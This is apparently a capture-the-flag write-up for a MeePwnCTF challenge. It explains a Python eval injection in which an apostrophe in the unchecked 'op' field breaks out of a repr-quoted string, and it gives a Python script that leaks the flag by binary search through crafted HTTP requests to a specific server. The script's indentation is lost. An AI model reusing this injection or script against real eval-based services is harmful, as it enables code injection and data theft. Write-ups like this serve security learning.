`repr` returns a string that evaluates to single-quoted string literal. For example `repr("foo")` == `"'foo'"`. So for normal input the string that gets evaluated looks like `"'value1'=='value2'"`. The second character of "op" is unchecked, so you can use an apostrophe to break out of the second value's string literal. You can't use apostrophes within your values though, so to avoid an error, you can insert a `#` to comment out the tail of the string: For example, submitting "foo", "+'", and "+FLAG#" will evaulate `"'foo'+''+FLAG#'"`. This evaluates without error, but results in "Invalid" being output since the result type is a string. You need to extract the flag through expressions that evaluate to either numbers or booleans. If you need to use forbidden value characters, you can use the `source` variable in your expressions. A character-by-character binary search to fetch the entire flag can be done like this:

```
import requests
import urllib

known = 'MeePwnCTF{'

while True:
print(known)

left = ord(' ')
right = ord('~')

while True:
if left == right:
known += chr(left)
break

middle = left + (right - left + 1) / 2
guess = known + chr(middle)
print('left {}, right {}, guessing {}'.format(chr(left), chr(right), guess))

r = requests.get('http://178.128.96.203/cgi-bin/server.py?value1=Mee&op=%2B%27&value2=%2Bsource%3CFLAG%23&source='+urllib.quote_plus(guess[3:]))
isLess = 'True' in r.text

if isLess:
left = middle
else:
right = middle - 1
```